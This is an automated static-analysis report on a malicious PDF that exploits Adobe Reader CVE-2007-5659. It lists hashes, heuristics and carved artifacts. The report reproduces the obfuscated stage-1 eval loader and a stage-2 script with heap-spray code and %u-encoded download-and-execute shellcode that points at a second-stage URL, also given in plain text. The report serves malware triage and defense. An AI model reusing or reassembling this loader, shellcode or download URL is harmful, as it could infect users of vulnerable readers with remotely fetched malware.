Malicious PDF — malware analysis report

Static analysis result for SHA-256 029111fdb352cc6f…

Verdict: MALICIOUS
File type: PDF
Size: 17.3 KB
MD5: ae62ee65e507a31ceb3fe011b59c21dc
SHA-1: d3690459289d0e369a9b63f4e0a19ceff08d3df2
SHA-256: 029111fdb352cc6fe7d42ddbbc764b252c59d0875c648f5fd32e41eed72d5a11
Risk Score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The sample is a PDF file that contains obfuscated JavaScript. This JavaScript is designed to exploit CVE-2007-5659 in Adobe Reader, specifically targeting versions between 7.1 and 8.11. The script attempts to download a second-stage payload from the URL http://bikora.info/page/gold.php/n00a106201r0007R43329fdcXaa7652dfY6d0a7020Z0100f070. The presence of anti-analysis checks and multi-stage obfuscation indicates a deliberate effort to conceal malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 [severity: critical; CVE match: exact; rule: CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action [severity: low; 5 related findings; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster [severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper [severity: high; rule: PDF_JS_OBFUSCATED_DROPPER]
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL [severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [severity: low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 [severity: critical; rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact [severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [severity: info; rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://bikora.info/page/gold.php/n00a106201r0007R43329fdcXaa7652dfY6d0a7020Z0100f070 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

javascript_obj0009_000.js
  SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
  Kind: pdf-javascript-stream
  Source: PDF /JS object 9 at offset 0x42EB
  Size: 469 bytes
  Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token)
  Preview script (first 1,000 lines of the extracted script):
// Stage-1 loader as carved from /JS object 9. Analyst comments added for the report;
// the script itself is reproduced unchanged.
var pr = null;
var fnc = 'ev';   // method name is assembled one character at a time ('ev' + 'a' + 'l')
var sum = '';

app.doc.syncAnnotScan();

// Plug-in count checks act as a crude sandbox/emulator gate: stubbed Acrobat
// environments often report zero plug-ins, so each stage is skipped there.
if (app.plugIns.length != 0) {
	var num = 1;

	// The encoded next stage is carried in the subject of an annotation on page 0
	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);   // subject is a '-'-separated list of hex byte values

	// Hex decode loop: every token becomes one character of the decoded stage
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	// Resolves to app['eval'](buf): indirect eval via property lookup; the empty
	// comment between name and call defeats naive "eval(" pattern matching
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
  SHA-256: 292f91d5739bf89158f41a70c7ab6b147a697e09ce14dd32f10bcc9989164792
  Kind: deobfuscated-js
  Source: z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1A94
  Size: 5292 bytes
  Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building tokens)
  Preview script (first 1,000 lines of the extracted script):
var Pk_1e1Vy__xNtA = new Array();var JQxh2uOg_6p_W = 0;var g12s__t = "";function e5_0JP(HK_7_i_21jqBUt, O__OW5__780){var S4jVgo = O__OW5__780.toString();var pA3__Sv4amo4_M = "";for(var VeVD6vcPbx = 0; VeVD6vcPbx < S4jVgo.length; VeVD6vcPbx++) {var a5__j_515s = parseInt(S4jVgo.substr(VeVD6vcPbx, 1));if (!isNaN(a5__j_515s)) {a5__j_515s = a5__j_515s.toString(16);if (a5__j_515s.length == 1) { a5__j_515s = "0" + a5__j_515s; }else if (a5__j_515s.length != 2) { a5__j_515s = "00"; }pA3__Sv4amo4_M = a5__j_515s + pA3__Sv4amo4_M;if (pA3__Sv4amo4_M.length == 8) {break;}}}while(pA3__Sv4amo4_M.length < 8) { pA3__Sv4amo4_M = "0" + pA3__Sv4amo4_M; }var MM7__k0jxAh = HK_7_i_21jqBUt.toString(16);if (MM7__k0jxAh.length == 1) { MM7__k0jxAh = "0" + MM7__k0jxAh; }else if (MM7__k0jxAh.length != 2) { MM7__k0jxAh = "00"; }pA3__Sv4amo4_M = "3" + MM7__k0jxAh + "P" + pA3__Sv4amo4_M;return pA3__Sv4amo4_M;}function p4_wh_m__1Od_h(HqcH___81__5qUg, nwr_32M__k){var X8_t2_x3bE_xOo = new Array("");var VO6_my6lbiUrj = HqcH___81__5qUg;var OJ__c7v6_Qn;if ((OJ__c7v6_Qn = HqcH___81__5qUg.lastIndexOf("%u00")) != -1) {if (OJ__c7v6_Qn + 6 == HqcH___81__5qUg.length) {X8_t2_x3bE_xOo[0] = HqcH___81__5qUg.substr(OJ__c7v6_Qn + 4, 2);VO6_my6lbiUrj = HqcH___81__5qUg.substring(0, OJ__c7v6_Qn);}}OJ__c7v6_Qn = 1;for (VeVD6vcPbx = 0; VeVD6vcPbx < nwr_32M__k.length; VeVD6vcPbx++) {var YYJ_04ij_Yj_F = nwr_32M__k.charCodeAt(VeVD6vcPbx).toString(16);if (YYJ_04ij_Yj_F.length == 1) { YYJ_04ij_Yj_F = "0" + YYJ_04ij_Yj_F; }X8_t2_x3bE_xOo[OJ__c7v6_Qn] = YYJ_04ij_Yj_F;OJ__c7v6_Qn++;}VeVD6vcPbx = X8_t2_x3bE_xOo[0].length ? 
0 : 1;X8_t2_x3bE_xOo[OJ__c7v6_Qn] = "00";X8_t2_x3bE_xOo[OJ__c7v6_Qn + 1] = "00";OJ__c7v6_Qn += 2;if ((X8_t2_x3bE_xOo.length - VeVD6vcPbx) % 2) {X8_t2_x3bE_xOo[OJ__c7v6_Qn] = "00";}while(VeVD6vcPbx < X8_t2_x3bE_xOo.length) {VO6_my6lbiUrj += "%u" + X8_t2_x3bE_xOo[VeVD6vcPbx + 1] + X8_t2_x3bE_xOo[VeVD6vcPbx];VeVD6vcPbx += 2;}VO6_my6lbiUrj += "%u0000";return VO6_my6lbiUrj;}function kius_M_36_B(xVDC1nTUMoL, uEW_aHCm){while (xVDC1nTUMoL.length*2<uEW_aHCm) {xVDC1nTUMoL += xVDC1nTUMoL;}xVDC1nTUMoL = xVDC1nTUMoL.substring(0,uEW_aHCm/2);return xVDC1nTUMoL;}function G_b15_K_u_o(mG_G1c_46R8Dw, tL0VK1l_Uq, k__3BE){var o_y0_n_V___8sk = 0x0c0c0c0c;var xVDC1nTUMoL = unescape(tL0VK1l_Uq);var nwr_32M__k = e5_0JP(mG_G1c_46R8Dw, k__3BE);var YX8__H3TB2__oN = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var HqcH___81__5qUg = "%u9050%u9050%u9050%u9050" + 
"%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4b70%u4751%u6a6b%u4370%u004c%u7468%u7074%u2f3a%u622f%u6b69%u726f%u2e61%u6e69%u6f66%u702f%u6761%u2f65%u6f67%u646c%u702e%u7068%u6e2f%u3030%u3161%u3630%u3032%u7231%u3030%u3730%u3452%u3333%u3932%u6466%u5863%u6161%u3637%u3235%u6664%u3659%u3064%u3761%u3230%u5a30%u3130%u3030%u3066%u3037";app.qj_4__1_Fx = unescape(p4_wh_m__1Od_h(HqcH___81__5qUg, nwr_32M__k));var U218i45FGIsr8 = 0x400000;var Y_Dp_8_JR5wK = YX8__H3TB2__oN.length * 2;var uEW_aHCm = U218i45FGIsr8 - (Y_Dp_8_JR5wK+0x38);xVDC1nTUMoL = kius_M_36_B(xVDC1nTUMoL, uEW_aHCm);var xjX_Bp = (o_y0_n_V___8sk - 0x400000)/U218i45FGIsr8;for (var yCgC6g0e___t = 0; yCgC6g0e___t < xjX_Bp; y
... (truncated)
deobfuscated.js
  SHA-256: 0476eb05c01d0763a3dd92fa596efcf81d5979e8df4a9604f5404196e477a20a
  Kind: deobfuscated-js
  Source: PDF JavaScript deobfuscation pass
  Size: 170287 bytes
  Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building tokens and 2 long base64-like blobs)
  Preview script (first 1,000 lines of the extracted script):
... (truncated)